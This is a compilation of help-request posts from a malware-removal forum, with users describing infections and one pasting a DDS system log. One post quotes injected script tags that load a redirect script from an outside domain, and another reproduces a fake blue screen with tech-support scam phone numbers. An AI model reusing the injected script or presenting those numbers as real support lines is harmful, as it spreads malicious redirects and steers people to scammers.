============= FINISH: 19:22:34.40 ===============

Attached Files

attach.txt (10.9 KB)

please excuse my grammar right now because that is the problem. for some reason i think a virus has messed with my keys and i am unable to use shift or alt.

whenever i use shift its almost like they are being clicked at the same time. for example if i hold shift the underlines will appear in file, edit notepad. i cant use capitals at all and i know the keys haven't been swapped around because i tried using alt and that does not work either.

i have also tried going into language in control panel tried changing languages, moving one from the bottom to top and i tried all that and still get the same result.

i also tried restoring to a previous date and that did not work either, but i was not able to go very far back unfortunately which is possible that this error was occuring then i just did not realize

anyway if you have any ideas please let me know, i appreciate it

thank you

Hi all,

new here so please go easy on me :)

I have a laptop that was riddled with viruses. Managed to download AVG and ran it and it took out 468 threats. Since that has run I cannot log onto the internet.

I have used command promt ..... ipconfig/all and I have ip address. I have then on the command promt used ping google.com and that they have come back as sent = 4 recieved -4 lost - 0 <0% loss>

but for some reason when i use chrome or internet explorer which are the only two internet programs i have it just says no data received???

Any ideas or help would be great.

Thank you

Darren

I started an istallation this morning of a program called Replay Media Catcher. Winpatrol popped up a warning that a program was installing itself in my startup registry and I rejected that change and tried to abort the installation. I then got the popup in attachment one, "file crashing Scotty.bmp". When I click "reject change" I get the popup in attachment two, "file crashing Scotty.bmp 2". When I select "Yes" on that popup I immediately get the popup in attachment three, "file crashing Scotty.bmp 3" and Winpatrol crashes. If I select "No" in that popup, it just keeps popping back up in an endless loop until I let it crash Winpatrol.

Replay Media Catcher was listed as being safe in my research, but it apparently is not. Help appreciated! :banghead:

Attached Images

	file crashing Scotty.bmp (767.7 KB)
	file crashing Scotty.bmp 2.bmp (490.8 KB)
	file crashing Scotty.bmp 3.bmp (541.5 KB)

i try to set up my secuirity
by using

Commodo intenret secuirty
(anti virus disabled)

Avast as my antivirus.

and Malwarebyte
as my anti-Malwarebyte

is this a good protection set up
or will those
programs will contradict each other?

Hey guys, I was sent here by the Microsoft BSOD forum, since they thought these bluescreens may be related to some kind of infection. My old thread is here:

hxxp://www.techsupportforum.com/forums/f299/blue-screens-on-boot-1004498.html

Basically on boot, the computer immediately bluescreens and restarts itself. I was able to boot into safemode, but then my buddy just took a look at it and got a bit overzealous with uninstalling drivers to try and get rid of the BSOD, and now it can't boot into safe mode or with the last known good configuration either. I do have access to Windows installation media, and can burn other boot disks as needed. Since I couldn't boot it though, I can't run dds.scr... is there any way to run it from a boot disk or something?

Finally, I'll copy here the details about my laptop from the other thread:

· OS - Windows Vista Home Premium
· x86
· What was the original installed OS on the system? - Windows Vista Home Premium
· Is the OS an OEM version (came pre-installed on system) or full retail version (YOU purchased it from retailer)? - OEM
· Approximate age of system (hardware) - don't know (not my computer)
· Approximate age of OS installation (if you know) - don't know
· Have you re-installed the OS? - No

· CPU - Intel Core 2 Duo T6500
· Video Card - doesn't show up in dxdiag
· MotherBoard (if NOT a laptop)
· Power Supply - brand & wattage (if NOT a laptop)

· System Manufacturer - Dell
· Exact model number (if laptop, check label on bottom) - PP41L

Thank you so much in advance for any help or direction you might be able to give me!

Hi all,

I run Microsoft Security Essentials, paired with Malware Antibytes Pro (Malware, not AV).

Once a week or more, I run AdwCleaner, and CCleaner.

I just uninstalled Qbittorent for First-steps and have DDS and Hijackthis logs.

My CPU will run fine for several hours, then start freezing sporadically for 3-5 seconds, but normally only when I am connected to the internet (cable or Wifi).

This isn't just browsers, but all programs- video, iTunes, trying to type in MS Word, etc.

A month ago I just re-installed windows in a clean-wipe for Acer (so not completely clean, but I removed the Acer junk), since I had a bunch of Malware.

Now I feel like I picked up some more malware that isn't being found by my above programs, due to the entire system freezing sporadically when connected to the internet.

Sometimes it goes away after 2x restarts.


DDS pasted below:



DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17840
Run by xlrambling at 8:37:04 on 2015-06-20
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.3934.1683 [GMT -6:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
SP: Microsoft Security Essentials *Enabled/Updated* {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\WLANExt.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
c:\Windows\Prey\wpxsvc.exe
C:\Windows\System32\svchost.exe -k utcsvc
C:\Program Files\Acer\Acer ePower Management\ePowerSvc.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files\Intel\iCLS Client\HeciServer.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
C:\Windows\Prey\current\bin\node.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\Explorer.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
c:\Windows\Prey\versions\1.3.9\node_modules\triggers\bin\lightevt.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
c:\Program Files\Microsoft Security Client\NisSrv.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\GWX\GWX.exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Program Files\Elantech\ETDCtrl.exe
C:\Program Files\Acer\Acer ePower Management\ePowerTray.exe
C:\Windows\system32\igfxsrvc.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\igfxext.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files\Acer\Acer ePower Management\ePowerEvent.exe
C:\Program Files\Elantech\ETDCtrlHelper.exe
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
C:\Windows\system32\svchost.exe -k SDRSVC
C:\Windows\servicing\TrustedInstaller.exe
C:\Program Files (x86)\VideoLAN\VLC\vlc.exe
C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE
C:\Windows\splwow64.exe
C:\Windows\system32\taskhost.exe
C:\Program Files (x86)\Wisdom-soft ScreenHunter 6.0 Free\ScreenHunter.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Notepad++\notepad++.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
C:\Users\xlrambling\AppData\Local\Google\Google Talk Plugin\googletalkplugin.exe
C:\Windows\system32\taskeng.exe
C:\Windows\SysWOW64\DllHost.exe
C:\Program Files (x86)\Windows Live\Installer\wlarp.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\svchost.exe -k swprv
C:\Windows\system32\msiexec.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://acer.msn.com
uDefault_Page_URL = hxxp://acer.msn.com
mWinlogon: Userinit = userinit.exe
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
uRun: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
uRun: [f.lux] "C:\Users\xlrambling\AppData\Local\FluxSoftware\Flux\flux.exe" /noshow
uRun: [Google Update] "C:\Users\xlrambling\AppData\Local\Google\Update\GoogleUpdate.exe" /c
dRunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid}
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~4\Office12\EXCEL.EXE/3000
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
IE: {A95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll/204
TCP: NameServer = 75.75.76.76 75.75.75.75
TCP: Interfaces\{513472FE-0CFD-4120-A3E8-58B3B1CF50C3} : DHCPNameServer = 75.75.76.76 75.75.75.75
TCP: Interfaces\{6838EE3D-728C-4CF4-9A6F-4655A3E94550} : DHCPNameServer = 75.75.76.76 75.75.75.75
TCP: Interfaces\{6838EE3D-728C-4CF4-9A6F-4655A3E94550}\3514C44502C414B4540234F4646454540224255414B4 : DHCPNameServer = 192.168.1.1
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\43.0.2357.124\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-Run: [IgfxTray] C:\Windows\System32\igfxtray.exe
x64-Run: [HotKeysCmds] C:\Windows\System32\hkcmd.exe
x64-Run: [Persistence] C:\Windows\System32\igfxpers.exe
x64-Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
x64-Run: [ETDCtrl] C:\Program Files (x86)\Elantech\ETDCtrl.exe
x64-Run: [Power Management] C:\Program Files\Acer\Acer ePower Management\ePowerTray.exe
x64-Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: igfxcui - igfxdev.dll
x64-SSODL: WebCheck - <orphaned>
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\xlrambling\AppData\Roaming\Mozilla\Firefox\Profiles\44frtrc8.default-1428326091743\
FF - prefs.js: browser.startup.homepage - hxxps://www.google.com/
FF - plugin: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll
FF - plugin: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\Users\xlrambling\AppData\Local\Google\Update\1.3.27.5\npGoogleUpdate3.dll
FF - plugin: C:\Users\xlrambling\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll
FF - plugin: C:\Users\xlrambling\AppData\Roaming\Mozilla\plugins\npo1d.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_188.dll
.
============= SERVICES / DRIVERS ===============
.
R0 MpFilter;Microsoft Malware Protection Driver;C:\Windows\System32\drivers\MpFilter.sys [2015-3-4 280376]
R2 NisDrv;Microsoft Network Inspection System;C:\Windows\System32\drivers\NisDrvWFP.sys [2014-11-15 124568]
R3 b57xdbd;Broadcom xD Picture Bus Driver Service;C:\Windows\System32\drivers\b57xdbd.sys [2011-11-4 68648]
R3 b57xdmp;Broadcom xD Picture vstorp client drv;C:\Windows\System32\drivers\b57xdmp.sys [2011-11-4 19496]
R3 bScsiMSa;bScsiMSa;C:\Windows\System32\drivers\bScsiMSa.sys [2011-9-2 51752]
R3 bScsiSDa;bScsiSDa;C:\Windows\System32\drivers\bScsiSDa.sys [2012-6-1 83576]
R3 ETD;ELAN PS/2 Port Input Device;C:\Windows\System32\drivers\ETD.sys [2013-3-20 238384]
R3 IntcDAud;Intel(R) Display Audio;C:\Windows\System32\drivers\IntcDAud.sys [2013-3-20 331264]
R3 k57nd60a;Broadcom NetLink (TM) Gigabit Ethernet - NDIS 6.0;C:\Windows\System32\drivers\k57nd60a.sys [2012-1-19 435240]
R3 MBAMProtector;MBAMProtector;C:\Windows\System32\drivers\mbam.sys [2015-4-5 25816]
R3 MBAMSwissArmy;MBAMSwissArmy;C:\Windows\System32\drivers\MBAMSwissArmy.sys [2015-4-5 136408]
R3 MBAMWebAccessControl;MBAMWebAccessControl;C:\Windows\System32\drivers\mwac.sys [2015-4-5 63704]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2010-11-20 59392]
S3 TsUsbGD;Remote Desktop Generic USB Device;C:\Windows\System32\drivers\TsUsbGD.sys [2010-11-20 31232]
S3 WDC_SAM;WD SCSI Pass Thru driver;C:\Windows\System32\drivers\wdcsam64.sys [2015-3-11 14464]
.
=============== File Associations ===============
.
FileExt: .txt: Applications\notepad++.exe="C:\Program Files (x86)\Notepad++\notepad++.exe" "%1" [UserChoice]
.
=============== Created Last 30 ================
.
2015-06-20 13:50:55 75888 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{4A68611C-0C49-4EA8-A579-FEBCA8C63C1F}\offreg.912.dll
2015-06-20 13:46:49 12214312 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{4A68611C-0C49-4EA8-A579-FEBCA8C63C1F}\mpengine.dll
2015-06-19 01:44:36 1187344 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{C8BEC0FB-015F-497C-8AFE-F8AEFD4FD29E}\gapaengine.dll
2015-06-19 01:43:41 12214312 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2015-06-10 00:54:51 3206144 ----a-w- C:\Windows\System32\win32k.sys
2015-06-06 16:38:07 -------- d-----w- C:\Windows\en
2015-06-06 16:37:34 -------- d-----w- C:\Windows\fr
2015-06-06 16:37:30 -------- d-----w- C:\Windows\es
2015-06-06 16:37:25 -------- d-----w- C:\Windows\pt-br
2015-06-06 16:33:20 77656 ----a-w- C:\Windows\System32\XAPOFX1_5.dll
2015-06-06 16:33:20 74072 ----a-w- C:\Windows\SysWow64\XAPOFX1_5.dll
2015-06-06 16:33:20 527192 ----a-w- C:\Windows\SysWow64\XAudio2_7.dll
2015-06-06 16:33:20 518488 ----a-w- C:\Windows\System32\XAudio2_7.dll
2015-06-06 16:33:20 2526056 ----a-w- C:\Windows\System32\D3DCompiler_43.dll
2015-06-06 16:33:20 2106216 ----a-w- C:\Windows\SysWow64\D3DCompiler_43.dll
2015-06-06 16:33:19 276832 ----a-w- C:\Windows\System32\d3dx11_43.dll
2015-06-06 16:33:19 248672 ----a-w- C:\Windows\SysWow64\d3dx11_43.dll
2015-06-06 16:31:37 6081224 ----a-w- C:\Program Files (x86)\Common Files\Windows Live\.cache\e11465841d0a07502\onedrivesetup.exe
2015-06-06 16:31:37 -------- d-----w- C:\Program Files (x86)\Microsoft OneDrive
2015-06-06 16:31:35 -------- d-----r- C:\Users\xlrambling\OneDrive
2015-06-06 16:31:11 -------- d-----w- C:\ProgramData\Microsoft OneDrive
2015-06-06 16:29:08 525656 ----a-w- C:\Program Files (x86)\Common Files\Windows Live\.cache\e716b91a1d0a07504\DXSETUP.exe
2015-06-06 16:29:07 94040 ----a-w- C:\Program Files (x86)\Common Files\Windows Live\.cache\e716b91a1d0a07504\DSETUP.dll
2015-06-06 16:29:07 1691480 ----a-w- C:\Program Files (x86)\Common Files\Windows Live\.cache\e716b91a1d0a07504\dsetup32.dll
2015-06-06 16:29:03 89944 ----a-w- C:\Program Files (x86)\Common Files\Windows Live\.cache\e42226261d0a07503\DSETUP.dll
2015-06-06 16:29:03 537432 ----a-w- C:\Program Files (x86)\Common Files\Windows Live\.cache\e42226261d0a07503\DXSETUP.exe
2015-06-06 16:29:03 1801048 ----a-w- C:\Program Files (x86)\Common Files\Windows Live\.cache\e42226261d0a07503\dsetup32.dll
2015-06-06 16:28:53 89944 ----a-w- C:\Program Files (x86)\Common Files\Windows Live\.cache\df7296451d0a07501\DSETUP.dll
2015-06-06 16:28:53 537432 ----a-w- C:\Program Files (x86)\Common Files\Windows Live\.cache\df7296451d0a07501\DXSETUP.exe
2015-06-06 16:28:53 1801048 ----a-w- C:\Program Files (x86)\Common Files\Windows Live\.cache\df7296451d0a07501\dsetup32.dll
2015-06-06 16:28:49 -------- d-----w- C:\Users\xlrambling\AppData\Local\Windows Live
2015-06-01 23:44:06 -------- d-----w- C:\Users\xlrambling\AppData\Local\GWX
.
==================== Find3M ====================
.
2015-06-20 13:32:31 136408 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2015-06-11 03:41:25 778416 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2015-06-11 03:41:25 142512 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2015-05-25 18:24:00 5569984 ----a-w- C:\Windows\System32\ntoskrnl.exe
2015-05-25 18:23:59 95680 ----a-w- C:\Windows\System32\drivers\ksecdd.sys
2015-05-25 18:23:59 155584 ----a-w- C:\Windows\System32\drivers\ksecpkg.sys
2015-05-25 18:21:21 1728960 ----a-w- C:\Windows\System32\ntdll.dll
2015-05-25 18:18:56 43520 ----a-w- C:\Windows\System32\csrsrv.dll
2015-05-25 18:18:56 22016 ----a-w- C:\Windows\System32\credssp.dll
2015-05-25 18:18:54 879104 ----a-w- C:\Windows\System32\advapi32.dll
2015-05-25 18:18:45 47104 ----a-w- C:\Windows\System32\typeperf.exe
2015-05-25 18:18:45 404992 ----a-w- C:\Windows\System32\tracerpt.exe
2015-05-25 18:18:39 112640 ----a-w- C:\Windows\System32\smss.exe
2015-05-25 18:18:32 296960 ----a-w- C:\Windows\System32\rstrui.exe
2015-05-25 18:18:30 43008 ----a-w- C:\Windows\System32\relog.exe
2015-05-25 18:18:19 31232 ----a-w- C:\Windows\System32\lsass.exe
2015-05-25 18:18:19 104448 ----a-w- C:\Windows\System32\logman.exe
2015-05-25 18:18:11 19456 ----a-w- C:\Windows\System32\diskperf.exe
2015-05-25 18:18:08 338432 ----a-w- C:\Windows\System32\conhost.exe
2015-05-25 18:18:04 64000 ----a-w- C:\Windows\System32\auditpol.exe
2015-05-25 18:14:26 60416 ----a-w- C:\Windows\System32\msobjs.dll
2015-05-25 18:14:04 146432 ----a-w- C:\Windows\System32\msaudite.dll
2015-05-25 18:07:34 3989440 ----a-w- C:\Windows\SysWow64\ntkrnlpa.exe
2015-05-25 18:07:34 3934144 ----a-w- C:\Windows\SysWow64\ntoskrnl.exe
2015-05-25 18:04:08 1310744 ----a-w- C:\Windows\SysWow64\ntdll.dll
2015-05-25 18:00:44 40448 ----a-w- C:\Windows\SysWow64\typeperf.exe
2015-05-25 18:00:40 364544 ----a-w- C:\Windows\SysWow64\tracerpt.exe
2015-05-25 18:00:28 25600 ----a-w- C:\Windows\SysWow64\setup16.exe
2015-05-25 18:00:25 37888 ----a-w- C:\Windows\SysWow64\relog.exe
2015-05-25 18:00:17 82944 ----a-w- C:\Windows\SysWow64\logman.exe
2015-05-25 18:00:09 17408 ----a-w- C:\Windows\SysWow64\diskperf.exe
2015-05-25 18:00:04 50176 ----a-w- C:\Windows\SysWow64\auditpol.exe
2015-05-25 17:59:52 96768 ----a-w- C:\Windows\SysWow64\sspicli.dll
2015-05-25 17:59:52 5120 ----a-w- C:\Windows\SysWow64\wow32.dll
2015-05-25 17:59:51 274944 ----a-w- C:\Windows\SysWow64\KernelBase.dll
2015-05-25 17:57:31 60416 ----a-w- C:\Windows\SysWow64\msobjs.dll
2015-05-25 17:57:15 146432 ----a-w- C:\Windows\SysWow64\msaudite.dll
2015-05-25 17:00:56 36864 ----a-w- C:\Windows\System32\UtcResources.dll
2015-05-25 16:50:38 7680 ----a-w- C:\Windows\SysWow64\instnm.exe
2015-05-25 16:50:36 2048 ----a-w- C:\Windows\SysWow64\user.exe
2015-05-25 16:48:25 6144 ---ha-w- C:\Windows\SysWow64\api-ms-win-security-base-l1-1-0.dll
2015-05-25 16:48:25 4608 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-threadpool-l1-1-0.dll
2015-05-25 16:48:25 3584 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-xstate-l1-1-0.dll
2015-05-25 16:48:25 3072 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-util-l1-1-0.dll
2015-05-23 03:28:17 2724864 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2015-05-23 03:15:54 503808 ----a-w- C:\Windows\SysWow64\vbscript.dll
2015-05-23 03:15:40 62464 ----a-w- C:\Windows\SysWow64\iesetup.dll
2015-05-23 03:15:02 47616 ----a-w- C:\Windows\SysWow64\ieetwproxystub.dll
2015-05-23 03:14:51 341504 ----a-w- C:\Windows\SysWow64\html.iec
2015-05-23 03:13:48 64000 ----a-w- C:\Windows\SysWow64\MshtmlDac.dll
2015-05-23 03:05:21 115712 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2015-05-23 03:04:50 620032 ----a-w- C:\Windows\SysWow64\jscript9diag.dll
2015-05-23 02:52:43 60416 ----a-w- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2015-05-23 02:47:31 4305920 ----a-w- C:\Windows\SysWow64\jscript9.dll
2015-05-23 02:37:45 2052608 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2015-05-23 02:37:25 1155072 ----a-w- C:\Windows\SysWow64\mshtmlmedia.dll
2015-05-23 02:20:35 1950720 ----a-w- C:\Windows\SysWow64\wininet.dll
2015-05-22 19:16:55 2724864 ----a-w- C:\Windows\System32\mshtml.tlb
2015-05-22 19:16:44 4096 ----a-w- C:\Windows\System32\ieetwcollectorres.dll
2015-05-22 19:01:42 66560 ----a-w- C:\Windows\System32\iesetup.dll
2015-05-22 19:00:54 48640 ----a-w- C:\Windows\System32\ieetwproxystub.dll
2015-05-22 19:00:47 417792 ----a-w- C:\Windows\System32\html.iec
2015-05-22 19:00:25 584192 ----a-w- C:\Windows\System32\vbscript.dll
2015-05-22 18:59:27 88064 ----a-w- C:\Windows\System32\MshtmlDac.dll
2015-05-22 18:52:21 6026240 ----a-w- C:\Windows\System32\jscript9.dll
2015-05-22 18:47:49 144384 ----a-w- C:\Windows\System32\ieUnatt.exe
2015-05-22 18:47:34 114688 ----a-w- C:\Windows\System32\ieetwcollector.exe
2015-05-22 18:47:03 814080 ----a-w- C:\Windows\System32\jscript9diag.dll
2015-05-22 18:40:17 968704 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe
2015-05-22 18:29:31 77824 ----a-w- C:\Windows\System32\JavaScriptCollectionAgent.dll
2015-05-22 18:18:41 700416 ----a-w- C:\Windows\System32\generaltel.dll
2015-05-22 18:18:29 757248 ----a-w- C:\Windows\System32\invagent.dll
2015-05-22 18:18:24 423424 ----a-w- C:\Windows\System32\devinv.dll
2015-05-22 18:18:22 1021440 ----a-w- C:\Windows\System32\appraiser.dll
2015-05-22 18:18:21 45568 ----a-w- C:\Windows\System32\acmigration.dll
2015-05-22 18:18:21 227328 ----a-w- C:\Windows\System32\aepdu.dll
2015-05-22 18:13:03 1119232 ----a-w- C:\Windows\System32\aeinv.dll
2015-05-22 18:05:28 1359360 ----a-w- C:\Windows\System32\mshtmlmedia.dll
2015-05-22 18:05:06 2125824 ----a-w- C:\Windows\System32\inetcpl.cpl
2015-05-22 17:50:20 2426880 ----a-w- C:\Windows\System32\wininet.dll
2015-05-21 13:19:52 193536 ----a-w- C:\Windows\System32\aepic.dll
2015-05-01 13:17:03 124112 ----a-w- C:\Windows\System32\PresentationCFFRasterizerNative_v0300.dll
2015-05-01 13:16:41 102608 ----a-w- C:\Windows\SysWow64\PresentationCFFRasterizerNative_v0300.dll
2015-04-29 18:21:50 5120 ----a-w- C:\Windows\System32\msdxm.ocx
2015-04-29 18:21:50 5120 ----a-w- C:\Windows\System32\dxmasf.dll
2015-04-29 18:21:46 9728 ----a-w- C:\Windows\System32\spwmp.dll
2015-04-29 18:19:43 12625920 ----a-w- C:\Windows\System32\wmploc.DLL
2015-04-29 18:07:12 4096 ----a-w- C:\Windows\SysWow64\msdxm.ocx
2015-04-29 18:07:12 4096 ----a-w- C:\Windows\SysWow64\dxmasf.dll
2015-04-29 18:07:07 8192 ----a-w- C:\Windows\SysWow64\spwmp.dll
2015-04-29 18:05:19 12625408 ----a-w- C:\Windows\SysWow64\wmploc.DLL
2015-04-24 18:17:26 633856 ----a-w- C:\Windows\System32\comctl32.dll
2015-04-24 17:56:58 530432 ----a-w- C:\Windows\SysWow64\comctl32.dll
2015-04-24 15:56:57 29 ----a-w- C:\Windows\SysWow64\TempWmicBatchFile.bat
2015-04-20 03:17:07 1647104 ----a-w- C:\Windows\System32\DWrite.dll
2015-04-20 03:17:07 1179136 ----a-w- C:\Windows\System32\FntCache.dll
2015-04-20 02:56:29 1250816 ----a-w- C:\Windows\SysWow64\DWrite.dll
2015-04-18 03:10:57 460800 ----a-w- C:\Windows\System32\certcli.dll
2015-04-18 02:56:57 342016 ----a-w- C:\Windows\SysWow64\certcli.dll
2015-04-14 15:37:56 63704 ----a-w- C:\Windows\System32\drivers\mwac.sys
.
============= FINISH: 8:42:28.46 ===============

the problem started after i was taking some files from a teacher via my pendrive..
the contents were made shortcut by a virus..
i knew it was a virus but i still double clicked it and it popped out some error...
after that i right clicked on the SHORTCUT and clicked SCAN WITH AVG
and i could no longer see avg running anywhere..
i tried to run avg from its installed directory with administrator rights but it says "windows cannot access the specified path, device or file."
i can neither uninstall AVG nor Repair,,.. help

I had tried to download a driver for my printer. After doing so, I received an error message and a warning box that came down and said call 1-844-546-2998. Norton remotely went through my computer and removed any virus that may have been there. They said that the blue screen has to be a Microsoft problem and call them about the driver issue. I have no clue where to go from here. If I hit Ctrl+Alt+delete, I can get to my homepage but, after about 30 seconds, it goes directly back to the blue screen.

The blue screen says:

"A problem has been detected and windows has been shut down to prevent damage to your computer.

If this is the first time you've seen this stop error screen, restart your computer. If a driver is identified in the stop message, disable the driver or check with the manufacturer for driver updates. Try changing video adapters.

Check with your hardware vendor for any bios updates. Disable BIOS memory options such as caching or shadowing. If you need to use Safe Mode to remove or disable components, restart your computer, press F8 to select Advanced Startup Options, and then select Safe Mode.

For technical support to this problem, call Windows helpline: +1-888-991-9974.

Technical Information:

*** STOP: 0x0000001E (0xFFFFFFFFC00000094,0xFFFFFF8000C074D1E,0x000000000,0xFFFFFFFFFFD)"

I have 2 threats popping up on AVG when I load Chrome along with a cookies4.DAT error? and the machine is slow.

I also can not get into safe mode to remove some programs that wont delete in normal mode. I have held down F8 at the Dell logo, tapped F8, tapped F5.... still can not get safe mode menu.:banghead:

this is a Dell Vostro 1700 with Windows 7 Ultimate.

I will post logs once I am able to get into safemode.

My problem is the way one of my sites worked after I downloaded a file I did not want to. The file was off of 4shared(website) was not the right file and installed many programs to my computer. I got rid of those programs with "Programs and Features" in the "Control Panel" as well as "Revo Uninstaller" to get rid of those that would not delete. I thought things would work properly... I did several scans with Vipre(my antivirus) and when it wanted me to restart my computer, I did. After the restart, my homescreen background was fixed around which I did not know why. Then from there, I made sure things were "ok" again and I did another Vipre scan as well as a Windows Defender scan. I checked my browser (Firefox) and Audiotool(website) which I usually use all the time, did not seem to be working right. I tried different browsers but it just would not seem to load from link to link. The app in the site would not work as well. My only concern is the audiotool website. I dont know if that bad file put other bad things in my computer, but I really quite want this site to work for me. My flash player is fine and I also tried clearing Cache as well as site cookies. I did research and found out that the file may have been a Javascript Injection. When I looked at the source information for the site, I found one in there.
I only found one person online with the same exact problem as mine with the injection, but they never had it fixed. I cannot give out links therefore, I'll only hand out the script: <script src="http://us.clickscart.in/js/jquery-1.8.2.min.js" type="text/javascript"></script>
<script src="http://us.clickscart.in/js/redir.js" type="text/javascript"></script>
It would be a huge help for my issue to be solved, this tech forum seems amazing!

DDS:
DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17840 BrowserJavaVersion: 11.45.2
Run by FFCory at 22:03:57 on 2015-07-14
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.3571.2183 [GMT -4:00]
.
